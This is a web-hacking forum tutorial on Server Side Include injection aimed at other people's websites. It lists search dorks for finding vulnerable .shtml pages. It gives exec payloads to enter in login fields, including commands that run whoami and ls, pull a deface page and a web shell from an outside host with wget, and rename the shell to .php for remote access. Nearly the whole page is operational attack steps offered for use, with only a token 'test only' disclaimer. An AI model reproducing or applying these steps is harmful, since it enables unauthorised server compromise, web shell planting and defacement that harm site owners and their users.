Main » Articles » Web Hacking » SSI |
SSI (Server Side Include) Injection, Shell and Deface Page uploading Tutorial
Server Side Include allowed you to upload files in multi extensions, but in .php extension you can't execute your shell, you have to rename shell.txt to shell.php Lets Begin .... Dorks inurl:bin/Cklb/ inurl:login.shtml inurl:login.shtm inurl:login.stm inurl:search.shtml inurl:search.shtm inurl:search.stm inurl:forgot.shtml inurl:forgot.shtm inurl:forgot.stm inurl:register.shtml inurl:register.shtm inurl:register.stm inurl:login.shtml?page= Try any dork or find sites manually, To check vulnerability of websites enter these commands in Username and Password <!--#echo var="DATE_LOCAL" --> It Will show the Date <!--#exec cmd="whoami"--> It Will display which user is running on the server <pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux) It Will show all files in the directory <!-- #exec cmd="dir" --> (Windows) It Will display all files in the directory <pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> In Username and Password to view all files of website To upload a deface page, host/upload your deface page anywhere you can use pastehtml.com for it, then enter this command in Username and Password <!--#exec cmd="wget http://website.com/deface.html" --> To view your Deface page goto site.com/deface.html To upload a Shell on website you have to host your shell anywhere in .txt format then enter this command in login <!--#exec cmd="wget http://website.com/abc.txt" --> to check your txt file is uploaded or not list all files using <pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> Now you have to chnage .txt extention to .php to rename your txt file to php use this command <!--#exec cmd="mv abc.txt abc.php" --> Now goto site.com/abc.php and acess your shell :) Live demo (Please don't harm to site upload your files for test only ! Thanks ) | |
Views: 2789 | Comments: 3 | Rating: 5.0/1 |
Total comments: 3 | ||
| ||